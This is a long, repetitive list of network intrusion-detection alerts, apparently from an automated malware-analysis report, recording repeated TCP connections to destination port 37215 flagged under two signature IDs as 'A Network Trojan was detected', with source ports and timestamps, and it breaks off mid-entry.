                SID:2829579
                Source Port:57184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263782
                SID:2835222
                Source Port:41654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763328
                SID:2829579
                Source Port:44926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728508
                SID:2835222
                Source Port:37552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617629
                SID:2829579
                Source Port:59882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960906
                SID:2829579
                Source Port:56640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653173
                SID:2835222
                Source Port:59784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535182
                SID:2829579
                Source Port:60650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684904
                SID:2829579
                Source Port:58214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868355
                SID:2835222
                Source Port:51608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685542
                SID:2835222
                Source Port:58920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571165
                SID:2829579
                Source Port:45630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440285
                SID:2829579
                Source Port:38042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.689047
                SID:2829579
                Source Port:38170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993584
                SID:2835222
                Source Port:45346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842204
                SID:2835222
                Source Port:57196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871799
                SID:2829579
                Source Port:60216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432598
                SID:2829579
                Source Port:45668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902068
                SID:2835222
                Source Port:45832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558117
                SID:2835222
                Source Port:42842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321044
                SID:2835222
                Source Port:56866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927916
                SID:2835222
                Source Port:45828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990343
                SID:2829579
                Source Port:42062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665120
                SID:2835222
                Source Port:54178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076225
                SID:2829579
                Source Port:43908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.806944
                SID:2835222
                Source Port:54058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717346
                SID:2829579
                Source Port:36756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728727
                SID:2829579
                Source Port:37178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436098
                SID:2835222
                Source Port:37352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669765
                SID:2829579
                Source Port:35920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687994
                SID:2829579
                Source Port:56890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841364
                SID:2829579
                Source Port:43238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036916
                SID:2829579
                Source Port:43936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990620
                SID:2835222
                Source Port:57736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149980
                SID:2835222
                Source Port:58538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.577207
                SID:2829579
                Source Port:37184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659854
                SID:2829579
                Source Port:51672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562006
                SID:2829579
                Source Port:50268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947752
                SID:2835222
                Source Port:49086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165802
                SID:2829579
                Source Port:34572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419742
                SID:2835222
                Source Port:53112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911069
                SID:2835222
                Source Port:54712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982663
                SID:2835222
                Source Port:55036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287517
                SID:2829579
                Source Port:42956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321347
                SID:2829579
                Source Port:35454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703857
                SID:2829579
                Source Port:43498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010335
                SID:2835222
                Source Port:47804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.920112
                SID:2829579
                Source Port:48548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832654
                SID:2835222
                Source Port:41432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919507
                SID:2835222
                Source Port:37530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209266
                SID:2829579
                Source Port:37420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281038
                SID:2829579
                Source Port:50156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517776
                SID:2829579
                Source Port:36456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949494
                SID:2829579
                Source Port:42198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243580
                SID:2829579
                Source Port:48282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385457
                SID:2829579
                Source Port:37608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726305
                SID:2829579
                Source Port:50000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280408
                SID:2835222
                Source Port:53610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035101
                SID:2829579
                Source Port:41248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.112670
                SID:2835222
                Source Port:34470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.389759
                SID:2835222
                Source Port:44464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662081
                SID:2829579
                Source Port:34842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782370
                SID:2829579
                Source Port:53224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666786
                SID:2829579
                Source Port:57404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136838
                SID:2835222
                Source Port:36288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728263
                SID:2829579
                Source Port:46326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903548
                SID:2835222
                Source Port:42242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868321
                SID:2835222
                Source Port:41822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.983892
                SID:2829579
                Source Port:36806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766951
                SID:2835222
                Source Port:47374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706517
                SID:2835222
                Source Port:48902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371477
                SID:2835222
                Source Port:45076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841807
                SID:2835222
                Source Port:58716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359478
                SID:2829579
                Source Port:58434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384331
                SID:2829579
                Source Port:47376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.230972
                SID:2835222
                Source Port:48334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977298
                SID:2829579
                Source Port:47422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432052
                SID:2835222
                Source Port:58226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688877
                SID:2835222
                Source Port:37794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.546813
                SID:2829579
                Source Port:56690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931336
                SID:2835222
                Source Port:57764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225510
                SID:2829579
                Source Port:43446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881720
                SID:2835222
                Source Port:33772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071726
                SID:2835222
                Source Port:34924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.846302
                SID:2835222
                Source Port:55522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617392
                SID:2835222
                Source Port:36560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279552
                SID:2829579
                Source Port:55900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903705
                SID:2829579
                Source Port:52412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226994
                SID:2835222
                Source Port:43426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418372
                SID:2835222
                Source Port:60244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968804
                SID:2829579
                Source Port:53756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.557393
                SID:2829579
                Source Port:56986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257329
                SID:2829579
                Source Port:50120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784891
                SID:2835222
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669392
                SID:2829579
                Source Port:56928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815939
                SID:2835222
                Source Port:38932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233159
                SID:2829579
                Source Port:35096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669171
                SID:2829579
                Source Port:58372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763659
                SID:2829579
                Source Port:60698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785425
                SID:2829579
                Source Port:41496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037667
                SID:2829579
                Source Port:54694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523934
                SID:2829579
                Source Port:50316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160238
                SID:2829579
                Source Port:47140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025334
                SID:2829579
                Source Port:40750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944495
                SID:2835222
                Source Port:57248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232060
                SID:2835222
                Source Port:36638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816043
                SID:2829579
                Source Port:44572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800788
                SID:2829579
                Source Port:56414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550773
                SID:2829579
                Source Port:44314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281626
                SID:2835222
                Source Port:51450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032697
                SID:2829579
                Source Port:44108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583512
                SID:2829579
                Source Port:49390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949519
                SID:2829579
                Source Port:60268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.058566
                SID:2835222
                Source Port:53102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.853825
                SID:2835222
                Source Port:33078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703322
                SID:2829579
                Source Port:50752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463039
                SID:2835222
                Source Port:55532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.121280
                SID:2829579
                Source Port:37788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969838
                SID:2829579
                Source Port:45508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361862
                SID:2835222
                Source Port:37058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555716
                SID:2835222
                Source Port:57366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509779
                SID:2829579
                Source Port:45996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557831
                SID:2835222
                Source Port:43270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333557
                SID:2835222
                Source Port:32932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567777
                SID:2835222
                Source Port:39870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702148
                SID:2835222
                Source Port:58204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475172
                SID:2835222
                Source Port:45872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231056
                SID:2835222
                Source Port:48306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075269
                SID:2835222
                Source Port:49286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083528
                SID:2835222
                Source Port:54584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228472
                SID:2835222
                Source Port:60076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521304
                SID:2829579
                Source Port:60720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877233
                SID:2835222
                Source Port:56582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670963
                SID:2835222
                Source Port:51416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681806
                SID:2829579
                Source Port:60756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.941400
                SID:2835222
                Source Port:44496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583549
                SID:2829579
                Source Port:45738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931183
                SID:2835222
                Source Port:38972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022254
                SID:2835222
                Source Port:56088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263636
                SID:2829579
                Source Port:47802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321609
                SID:2835222
                Source Port:34898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166362
                SID:2835222
                Source Port:40292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266335
                SID:2829579
                Source Port:37410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785391
                SID:2835222
                Source Port:42814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468825
                SID:2829579
                Source Port:45238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990592
                SID:2829579
                Source Port:51774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984205
                SID:2835222
                Source Port:50990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797807
                SID:2829579
                Source Port:60378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177548
                SID:2835222
                Source Port:34382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287004
                SID:2829579
                Source Port:51524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762998
                SID:2835222
                Source Port:43064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394684
                SID:2835222
                Source Port:33420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871749
                SID:2835222
                Source Port:33788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871524
                SID:2835222
                Source Port:54146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362772
                SID:2829579
                Source Port:37788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507226
                SID:2835222
                Source Port:46978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964290
                SID:2829579
                Source Port:48904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660165
                SID:2829579
                Source Port:38618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.786699
                SID:2829579
                Source Port:55804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281864
                SID:2829579
                Source Port:55768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.277532
                SID:2829579
                Source Port:41110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929820
                SID:2835222
                Source Port:45820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281321
                SID:2829579
                Source Port:50954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899167
                SID:2829579
                Source Port:51928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281804
                SID:2835222
                Source Port:46830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.727819
                SID:2829579
                Source Port:50014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.693934
                SID:2829579
                Source Port:57678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968557
                SID:2829579
                Source Port:52190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163689
                SID:2829579
                Source Port:39584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559569
                SID:2835222
                Source Port:43728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.604528
                SID:2835222
                Source Port:41188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141078
                SID:2835222
                Source Port:51508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773032
                SID:2835222
                Source Port:59784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992999
                SID:2835222
                Source Port:43138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915173
                SID:2835222
                Source Port:46292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561036
                SID:2829579
                Source Port:47402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208019
                SID:2829579
                Source Port:56722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.972075
                SID:2829579
                Source Port:58860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685798
                SID:2835222
                Source Port:37668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184973
                SID:2829579
                Source Port:52576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321477
                SID:2829579
                Source Port:32868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980236
                SID:2835222
                Source Port:33258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559915
                SID:2829579
                Source Port:37178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948498
                SID:2829579
                Source Port:50112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318708
                SID:2829579
                Source Port:44536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240369
                SID:2829579
                Source Port:50648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852364
                SID:2829579
                Source Port:39394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557774
                SID:2829579
                Source Port:50744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226685
                SID:2835222
                Source Port:60288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703834
                SID:2829579
                Source Port:36272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397268
                SID:2829579
                Source Port:33838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722079
                SID:2835222
                Source Port:55322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.981107
                SID:2835222
                Source Port:54828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262076
                SID:2835222
                Source Port:42186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277497
                SID:2835222
                Source Port:54086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267607
                SID:2829579
                Source Port:39672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228413
                SID:2829579
                Source Port:45992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175575
                SID:2829579
                Source Port:54140
                Destination Port:37215
